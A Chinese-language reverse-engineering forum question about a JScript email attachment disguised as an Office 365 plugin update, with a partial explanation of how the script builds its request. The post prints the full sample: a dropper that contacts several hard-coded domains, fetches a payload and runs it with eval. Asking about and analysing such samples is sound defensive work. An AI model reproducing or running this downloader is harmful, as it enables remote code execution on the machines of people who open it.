可能是恶意的 Javascript-对其工作方式感兴趣

逆向工程 恶意软件 javascript
2021-06-16 23:23:08

这段有趣的代码以压缩附件的形式出现在一封电子邮件中，文件名为“Install-MSOffice365-WebView-Plugin-Update-0.165.11a.exe.js”。它无疑是恶意的，但我很好奇它到底做了什么——我本人并不是 JavaScript 程序员。

function abatae(beeraa) {beeraa.send();}
function greezno() {return 'COUNQWTER'.replace(/QW/g,"");}
function hust(rasp){eval(rasp);}
var x = ["gunbobinaj.com","www.apbfoundation.com","blog.enertres.com","kimyaalemi.com","alto-krvavica.hr"];
var mink = 0;
var mumik = new Array('GE'+'T');
var mustafa = x.length;
while(true)
{
    if(mink>=mustafa)
    {
        break;
    }
    try
    {       
        var lumin = new ActiveXObject("MSXML2.XMLHTTP");
        var zemk = '00000012Qi9ag1Lxi5WL5GYeqMUKg4dxY3wxqiSvY5p7zea6RhRlNYyPH5MZDQTqCM-SWpbTQcFystPcok-Ndq9EPbeFOaoUCWQf9OpN1waFD0-V9ZIty6Lgyw_hRmV0Cj0dW7c1yX1IRnw0';
        var ghyt = false;
        var gerlk = x[mink];        
        lumin.open(mumik[2-2], "http://"+gerlk+'/'+greezno()+'?'+zemk, ghyt);
        abatae(lumin);
        var gt = lumin.responseText;
        var miffka = gt.indexOf(zemk);
        var pista = gt.length;
        var miluoki = "a";
        if ((pista+0) > (8+1+1) * 100 && 2 == 2 && miffka + 2 > 1) 
        {
            var kichman = rizma(gt, zemk).join(miluoki+"");
            hust(kichman);
            break;
        }
    }
    catch(e)
    {
    };
    mink++;
};
function malysh() {return "htRESMtp".replace(/RESM/g,"");}
function rizma(kjg, lki) {  return kjg.split(lki);}

https://msdn.microsoft.com/en-us/library/ms759148(v=vs.85).aspx

The following Microsoft® JScript® example creates an XMLHTTP object and asks a server for an XML document. The server sends back an XML document, which is then displayed in a message box.
var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.6.0");  
xmlHttpReq.open("GET", "http://localhost/books.xml", false);  
xmlHttpReq.send();  
WScript.Echo(xmlHttpReq.responseText);  

如示例所示,这会发送一个请求

在 lumin.open() 处，请求 URL 由 x[0]（即 gerlk）、greezno() 和 zemk 拼接而成

其结果形如 http://gumboxxxxx/counter?0000yyyyyyyyyyyyyy

获取一个 xml 响应并解析它